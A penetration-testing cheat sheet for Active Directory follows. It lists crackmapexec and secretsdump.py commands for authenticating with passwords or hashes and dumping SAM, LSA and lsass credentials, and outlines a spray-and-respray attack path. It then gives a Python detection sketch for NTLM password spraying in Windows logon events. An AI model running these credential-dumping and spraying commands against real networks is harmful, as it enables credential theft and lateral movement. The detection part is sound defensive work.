# SMB
crackmapexec smb IP_ADDRESS or SUBNET -u USER -d DOMAIN -p PASSWORD
# SMB using Hash (only NTLMv1)
crackmapexec smb IP_ADDRESS or SUBNET -u USER -H HASH --local-auth
# Dump SAM - add this at the end of the command
--sam
# List shares on machines
--shares
# Dump LSA
--lsa
# Use lsassy to dump and parse lsass
-M lsassy
# Access CrackMapExec DB
cmedb
# Dumps all hosts in DB
hosts
# Dumps all creds in DB
creds
Secretsdump.py
Commands
# Using a password
secretsdump.py DOMAIN/USER:'PASSWORD'@IP_ADDRESS
# Using hashes
secretsdump.py USER@IP_ADDRESS -hashes HASH
Attack path
LLMNR -> hash -> crack hashes -> spray password -> look for new logins -> secretsdump with new logins -> local admin hashes -> respray network with local accounts
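
Seen from the defender's side, the spray and respray steps of this path appear as one source address making NTLM network logons with the same account name against many hosts in a short time. The following is an added detection sketch, not part of the original notes; the record layout mirrors fields of Windows Security events 4624/4625, and the sample data, function names and thresholds are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records shaped like Windows Security events
# 4624 (logon success) and 4625 (logon failure); not real log data.
def _ev(ts, eid, host, user, domain, src, ltype=3, pkg="NTLM"):
    return {"time": datetime.fromisoformat(ts), "event_id": eid, "computer": host,
            "user": user, "domain": domain, "src_ip": src,
            "logon_type": ltype, "auth_pkg": pkg}

SAMPLE_EVENTS = (
    # One source, same local account name, eight hosts within seconds
    [_ev(f"2024-01-10T09:00:{i:02d}", 4624 if i % 3 == 0 else 4625,
         f"WS{i:02d}", "Administrator", f"WS{i:02d}", "10.0.0.50") for i in range(8)]
    # Ordinary activity: domain account, Kerberos, two file servers
    + [_ev("2024-01-10T09:05:00", 4624, "FS01", "jsmith", "CORP", "10.0.0.21", pkg="Kerberos"),
       _ev("2024-01-10T09:06:00", 4624, "FS02", "jsmith", "CORP", "10.0.0.21", pkg="Kerberos")]
)

def find_spray_sources(events, window=timedelta(minutes=10), min_hosts=5):
    """Flag (src_ip, user) pairs that attempted NTLM network logons (type 3)
    against at least `min_hosts` distinct hosts inside a sliding `window`."""
    by_key = defaultdict(list)
    for e in events:
        if (e["event_id"] in (4624, 4625) and e["logon_type"] == 3
                and e["auth_pkg"] == "NTLM"):
            by_key[(e["src_ip"], e["user"].lower())].append(e)

    alerts = {}
    for key, evs in by_key.items():
        evs.sort(key=lambda e: e["time"])
        start, flagged = 0, []
        for end in range(len(evs)):
            # Shrink the window from the left until it spans <= `window`
            while evs[end]["time"] - evs[start]["time"] > window:
                start += 1
            if len({e["computer"] for e in evs[start:end + 1]}) >= min_hosts:
                flagged.extend(evs[start:end + 1])
        if flagged:
            alerts[key] = {
                "hosts": sorted({e["computer"] for e in flagged}),
                # Hosts that accepted the credential: rotate it there first
                "accepted_on": sorted({e["computer"] for e in flagged
                                       if e["event_id"] == 4624}),
            }
    return alerts
```

Hosts listed under `accepted_on` share a credential with each other; giving every machine a unique local administrator password (for example with LAPS) removes that overlap.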